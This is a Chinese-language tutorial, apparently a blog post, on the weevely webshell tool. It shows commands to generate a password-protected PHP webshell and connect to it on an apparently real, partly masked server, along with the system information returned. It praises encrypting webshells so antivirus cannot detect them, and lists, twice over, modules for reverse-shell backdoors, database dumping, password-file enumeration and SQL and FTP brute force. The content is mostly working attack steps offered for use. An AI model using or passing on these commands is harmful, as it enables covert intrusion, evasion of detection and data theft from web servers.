weevely 是BT5中一个常用的webshell后门连接工具，它发挥的作用类似于中国菜刀(chopper)。

root@bt:/pentest/backdoors/web/weevely# ./weevely.py generate ices gen.php

// 生成一个密码为 ices 的php webshell.

root@bt:/pentest/backdoors/web/weevely# ./weevely.py http://app.*.cn/common/gen.php ices

// ./weevely.py http://*.com/webshell.php [password]         连接

apache@HQEBWEBJ:/app/ecccs/web/common$ :system.info

// 按两下 tab键,进入操控模式,例如输入 system.info 获得系统信息

whoami:       apache

hostname:    HQEBWEBJ

basedir:                 /app/ecccs/web/common

uname:            Linux HQEBWEBJ 2.6.18-92.el5 #1 SMP Tue Apr 29 13:16:15 EDT 2008 x86_64 GNU/Linux

os:                     Linux

document_root:  /home/ecccs/web

safe_mode:           0

script:                     /common/gen.php

client_ip:               120.3*.56.156

max_execution_time:  30

php_self:                          /common/gen.php

apache@HQEBWEBJ:/app/ecccs/web/common$ cat /etc/issue

Red Hat Enterprise Linux Server release 5.2 (Tikanga) Kernel

// 执行一般的命令

加密功能

冷冷的夜提取了weevely的php加密模块  (其实这才是本文的亮点，用来免杀webshell)

$ python test.py  原.php  密.php

如下图,加密后的php一句话webshell代码中，只出现了str_replace这个熟知的函数,未出现其他关键字，这要查杀是非常难滴。

功能模块

系统 system.info             //收集系统信息 文件 file.read                   //读文件 file.upload               //上传本地文件 file.check                 //检查文件的权限和 file.enum                 //在本地词表的书面枚举远程文件 file.download          //下载远程二进制/ ASCII文件到本地 SQL sql.query                //执行SQL查询 sql.console            //启动SQL控制台 sql.dump               //获取SQL数据库转储 sql.summary         //获取SQL数据库中的表和列 后门 backdoor.tcp                       //TCP端口后门 backdoor.install                  //安装后门 backdoor.reverse_tcp        //反弹 枚举 audit.user_files                  //在用户家中列举常见的机密文件 audit.user_web_files        //列举常见的Web文件 audit.etc_passwd              //枚举/etc/passwd 查找 find.webdir             //查找可写的web目录 find.perm                     //查找权限可读/写/可执行文件和目录 find.name                    //按名称查找文件和目录 find.suidsgid                //查找SUID / SGID文件和目录 暴破 bruteforce.sql                    //暴力破解单一SQL用户 bruteforce.sql_users        //暴力破解SQL密码 bruteforce.ftp                    // 暴力破解单一FTP用户 bruteforce.ftp_users         //暴力破解FTP密码 系统 system.info   //收集系统信息 文件 file.read        //读文件 file.upload        //上传本地文件 file.check        //检查文件的权限和 file.enum        //在本地词表的书面枚举远程文件 file.download        //下载远程二进制/ ASCII文件到本地 SQL sql.query        //执行SQL查询 sql.console        //启动SQL控制台 sql.dump        //获取SQL数据库转储 sql.summary        //获取SQL数据库中的表和列 后门 backdoor.tcp                //TCP端口后门 backdoor.install        //安装后门 backdoor.reverse_tcp        //反弹 枚举 audit.user_files        //在用户家中列举常见的机密文件 audit.user_web_files        //列举常见的Web文件 audit.etc_passwd        //枚举/etc/passwd 查找 find.webdir        //查找可写的web目录 find.perm        //查找权限可读/写/可执行文件和目录 find.name        //按名称查找文件和目录 find.suidsgid        //查找SUID / SGID文件和目录 暴破 bruteforce.sql                //暴力破解单一SQL用户 bruteforce.sql_users        //暴力破解SQL密码 bruteforce.ftp               // 暴力破解单一FTP用户 bruteforce.ftp_users        //暴力破解FTP密码